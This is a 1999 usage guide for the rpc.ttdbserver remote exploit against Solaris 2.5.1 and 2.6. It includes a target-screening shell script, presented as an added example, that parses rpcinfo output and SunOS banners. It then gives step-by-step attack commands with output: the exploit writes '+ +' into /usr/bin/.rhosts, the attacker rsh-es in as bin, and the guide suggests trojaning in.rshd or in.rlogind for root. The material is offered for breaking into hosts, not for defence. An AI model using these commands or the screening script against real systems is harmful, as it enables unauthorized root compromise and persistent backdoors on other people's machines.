
==============================================================================
  rpc.ttdbserver remote exploit usage notes
  chris@anticode.com   April 26th 1999.
  http://www.anticode.com
==============================================================================

  This is a how-to for the rpc.ttdbserver remote exploit available on
  www.anticode.com under Solaris 2.6 exploits. It covers exploiting
  Solaris 2.5.1 and 2.6 machines.


  Finding vulnerable systems :

  To identify a vulnerable Solaris host, run rpcinfo -p <host> and look
  for an RPC service registered with program number 100083. Because the
  /etc/rpc file under Solaris doesn't associate program number 100083
  with any service, the service column for that entry will be blank.
  Note that the registration only tells you rpc.ttdbserver is running;
  a patched server registers the same program number, so this check
  alone does not prove the host is exploitable.

  Confirm the machine is running Solaris 2.5.1 or 2.6 by checking the
  FTP, Sendmail and Telnet banners (the FTP and Telnet banners name the
  OS as SunOS 5.5.1 or SunOS 5.6 respectively).
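  The checks above, as an added example that is not part of the original
  notes or of the anticode exploit: a small POSIX shell script that parses
  rpcinfo -p output for program 100083 and maps a SunOS banner string to the
  Solaris release name used in these notes. The rpcinfo listing, the banner
  strings, the host name and the port numbers are constructed for the
  example, and the function names are my own.

```shell
#!/bin/sh
# Added example (not part of the original notes): offline version of the
# "finding vulnerable systems" checks. All sample data below is constructed.

# Constructed sample of `rpcinfo -p victim.here.com` output. The 100083
# entry has an empty service column, as the notes describe.
SAMPLE_RPCINFO='   program vers proto   port  service
    100000    4   tcp    111  rpcbind
    100000    3   tcp    111  rpcbind
    100000    2   udp    111  rpcbind
    100024    1   udp  32772  status
    100083    1   tcp  32775
    100005    1   udp  32785  mountd
    100005    1   tcp  32776  mountd'

# Constructed sample banners from the same host.
SAMPLE_FTP_BANNER='220 victim.here.com FTP server (SunOS 5.6) ready.'
SAMPLE_TELNET_BANNER='SunOS 5.6'

# ttdb_endpoints: read `rpcinfo -p` output on stdin and print
# "vers proto port" for every registration of program 100083
# (rpc.ttdbserver). Exit status 0 if at least one was found, 1 otherwise.
ttdb_endpoints() {
    awk '$1 == "100083" { print $2, $3, $4; found = 1 }
         END { if (found) exit 0; exit 1 }'
}

# solaris_release: map the "SunOS 5.x" string carried by Solaris ftpd and
# telnetd banners to the Solaris 2.x release name used in the notes.
# Prints nothing and returns 1 for a banner that is neither release.
solaris_release() {
    case "$1" in
        *'SunOS 5.5.1'*) echo '2.5.1' ;;
        *'SunOS 5.6'*)   echo '2.6' ;;
        *)               return 1 ;;
    esac
}

# assess_target: combine both checks. Reads rpcinfo output on stdin and
# takes a banner as $1. Prints one of:
#   "candidate <release> <proto> <port>"  100083 registered, release matches
#   "skip <reason>"                       anything else (returns 1)
# This only tests for registration; a patched ttdbserver registers 100083
# too, so a "candidate" still has to be confirmed by other means.
assess_target() {
    banner=$1
    endpoints=$(ttdb_endpoints) || { echo 'skip no-ttdbserver'; return 1; }
    release=$(solaris_release "$banner") \
        || { echo 'skip unsupported-release'; return 1; }
    set -- $endpoints            # first registration: $1=vers $2=proto $3=port
    echo "candidate $release $2 $3"
}

# Demonstration on the constructed samples.
printf '%s\n' "$SAMPLE_RPCINFO" | assess_target "$SAMPLE_FTP_BANNER"
```

  In real use, replace the constructed samples with
  `rpcinfo -p <host> | assess_target "$(banner from ftp or telnet)"`;
  the proto/port pair printed is where the service is listening.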


  Compiling the exploit :

  A precompiled version of the exploit is available on www.anticode.com,
  although it can only be run from machines running Solaris 2.5.1. If
  you want to compile the exploit yourself, read the comments in the
  source code first.


  Using the exploit :

  If the target is running Solaris 2.5.1 you can run a command remotely
  as root. In this case the command writes an .rhosts file into bin's
  home directory, /usr/bin, so that you can then rsh in as bin, like so..


    # ./ttdb -k victim.here.com "echo '+ +' > /usr/bin/.rhosts"
    An event requires attention
    # ./ttdb victim.here.com "echo '+ +' > /usr/bin/.rhosts"
    An event requires attention
    # rsh -l bin victim.here.com csh -i
    victim% whoami
    bin
    victim%


  From there, you can obtain root by trojaning a service in the /usr/sbin
  directory that runs as root (such as in.rshd or in.rlogind); those
  binaries are owned by bin on these releases, which is why a bin login
  is enough.


  If the target is running Solaris 2.6, repeat the method, but add a '-6'
  argument to the second command, like so..


    # ./ttdb -k victim.here.com "echo '+ +' > /usr/bin/.rhosts"
    An event requires attention
    # ./ttdb -6 victim.here.com "echo '+ +' > /usr/bin/.rhosts"
    An event requires attention
    # rsh -l bin victim.here.com csh -i
    victim% whoami
    bin
    victim%


  And that's really all there is to it! There are ways of setting up
  rootshells listening on ports and the like, which we may address at
  a later date.
